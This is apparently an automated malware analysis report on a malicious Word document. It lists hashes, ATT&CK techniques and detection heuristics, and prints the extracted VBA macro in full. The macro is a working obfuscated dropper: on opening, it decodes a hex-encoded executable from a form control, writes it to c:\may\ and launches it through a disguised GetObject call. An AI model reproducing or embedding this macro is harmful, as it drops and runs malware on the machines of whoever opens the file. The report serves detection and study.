Office (OOXML) malware analysis — malicious · 0c46b98d7a5dab0c

MALICIOUS

Office (OOXML)

301.6 KB Created: 2020-05-11 15:09:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-07-24

MD5: 31ea7eecb1357707dc1921ae47c154e0 SHA-1: 64e22821efd17266b6f0cd2a81c268c841f58d63 SHA-256: 0c46b98d7a5dab0cb22c75e6c5f3853b63f7cdfd9a881dd342911fb7f829566c

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1105 Ingress Tool Transfer

The sample contains a malicious VBA macro that executes upon opening the document. The macro is obfuscated and uses GetObject to decode and write a hex-encoded executable to disk in the 'c:\may\' directory, naming it with a random string and a '.exe' extension. This executable is then likely run, indicating a downloader or dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1920 bytes
SHA-256: `8823726413b62b459df09e4dd2d19a913bf3c27d43ca26badd6326d21362370c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DocumentosTittle" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CheckBox1, 0, 0, MSForms, CheckBox" Private Sub Document_Open() Dim i, d Dim strTemp$, strReturn$, hextostr$ Dim Splits$(), CurFolder$ Dim GenerateFileName$, sFile$, sValues$ Splits$ = Split("c:\may", "\") For i = LBound(Splits) To UBound(Splits) CurFolder = CurFolder + Splits(i) + "\" If Dir(CurFolder, vbDirectory) = "" Then MkDir CurFolder Next i hextostr = DocumentosTittle.CheckBox1.Caption For i = 1 To Len(hextostr) Step 2 strTemp = Chr(Val("&H" + Mid(hextostr, i, 2))) strReturn = strReturn + strTemp Next i hextostr = Right(strReturn, Len(strReturn) - 1) Randomize sValues = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" sValues = sValues & UCase(sValues) & "" For i = 1 To Val("7") GenerateFileName = GenerateFileName & Mid(sValues, Int(Rnd() * Len(sValues) + 1), 1) Next i sFile = GenerateFileName d = Chr$(99) + Chr$(58) + Chr$(92) + Chr$(109) + Chr$(97) + Chr$(121) + Chr$(92) + sFile + Chr$(46) + Chr$(101) + Chr$(120) + Chr$(101) Open d For Binary As #1 Put #1, , Chr$(77) + hextostr + sFile Close #1 Dim obj3 Set obj3 = GetObject(ChrW(110) + ChrW(101) + ChrW(119) + ChrW(58) + ChrW(49) + ChrW(51) + ChrW(55) + ChrW(48) _ + ChrW(57) + ChrW(54) + ChrW(50) + ChrW(48) + ChrW(45) + ChrW(67) + ChrW(50) + ChrW(55) + ChrW(57) _ + ChrW(45) + ChrW(49) + ChrW(49) + ChrW(67) + ChrW(69) + ChrW(45) + ChrW(65) + ChrW(52) + ChrW(57) _ + ChrW(69) + ChrW(45) + ChrW(52) + ChrW(52) + ChrW(52) + ChrW(53) + ChrW(53) + ChrW(51) + ChrW(53) _ + ChrW(52) + ChrW(48) + ChrW(48) + ChrW(48) + ChrW(48)) obj3.Open d End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	15872 bytes
SHA-256: `7d8e51695f3f776eed1bbd8591fcf88bf2249ebd4084d2818462570106328237`

Open this report in the interactive analyzer, or submit your own file for analysis.